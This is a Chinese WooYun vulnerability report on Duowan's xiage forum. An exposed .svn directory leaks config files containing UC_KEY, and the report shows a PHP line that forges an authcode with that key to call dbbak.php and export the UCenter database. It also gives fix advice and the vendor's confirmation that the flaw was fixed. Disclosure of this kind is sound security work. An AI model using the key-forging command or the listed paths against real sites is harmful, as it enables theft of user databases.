当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-03753

漏洞标题:xiage论坛配置文件泄漏

相关厂商:广州多玩

漏洞作者: 天鱼

提交时间:2011-12-24 15:10

修复时间:2012-02-07 15:11

公开时间:2012-02-07 15:11

漏洞类型:重要敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-12-24: 细节已通知厂商并且等待厂商处理中
2011-12-24: 厂商已经确认,细节仅向厂商公开
2012-01-03: 细节向核心白帽子及相关领域专家公开
2012-01-13: 细节向普通白帽子公开
2012-01-23: 细节向实习白帽子公开
2012-02-07: 细节向公众公开

简要描述:

论坛存在svn信息,且能下载代码文件,导致论坛用户数据库泄漏

详细说明:

http://3g.yy.com/bbs/.svn/text-base/config.inc.php.svn-base
这里能下到xiage.yy.com论坛的配置文件,里面有UC_KEY,可以用该key绕过论坛邀请注册限制,直接连接ucenter注册用户
http://3g.yy.com/bbs/uc_server/data/.svn/text-base/config.inc.php.svn-base
这里能下到ucenter的配置文件,里面也有UC_KEY
如果只是这样还不严重,但论坛和ucenter有个数据库备份的文件dbbak.php,该文件在api目录下,该文件只验证KEY,只要key正确就可以进行数据库备份,数据库导入等操作
通过PHP生成对应的验证code

echo "apptype=ucenter&code=".urlencode(_authcode("time=".time()."&method=export", "ENCODE", UC_KEY));


然后访问http://xiage.yy.com/uc_server/api/dbbak.php?加上生成的code串
即可导出ucenter的数据库
把method改成list,即可知道网站的全路径

漏洞证明:

http://3g.yy.com/bbs/.svn/text-base/config.inc.php.svn-base
http://3g.yy.com/bbs/uc_server/data/.svn/text-base/config.inc.php.svn-base



修复方案:

把3g.yy.com/bbs/下面的.svn目录删除或者禁止外部访问
dbbak.php最好加上session登录验证(貌似是discuz的问题)
然后就是修改UC_KEY,删除导出的那份sql文件等等等

版权声明:转载请注明来源 天鱼@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2011-12-24 17:53

厂商回复:

正在处理,谢谢提供。

最新状态:

2012-01-08:已经修复,谢谢。


漏洞评价:

评论

  1. 2011-12-25 00:39 | 天鱼 ( 实习白帽子 | Rank:47 漏洞数:5 | 逝去的梦)

    呃,系统提示给我发了礼物?我很好奇我都没写地址怎么发礼物。。。。

  2. 2011-12-25 19:49 | Snow ( 实习白帽子 | Rank:54 漏洞数:6 | 换马甲 擦擦擦)

    等你挂了 多玩也许会给拟烧到下面去

  3. 2012-01-01 02:05 | 天鱼 ( 实习白帽子 | Rank:47 漏洞数:5 | 逝去的梦)

    呃,收到多玩给的YY熊了。。。

  4. 2013-03-05 12:27 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @天鱼 噗嗤

  5. 2013-03-08 18:51 | 天鱼 ( 实习白帽子 | Rank:47 漏洞数:5 | 逝去的梦)

    @xsser 挖坟啊。。。。。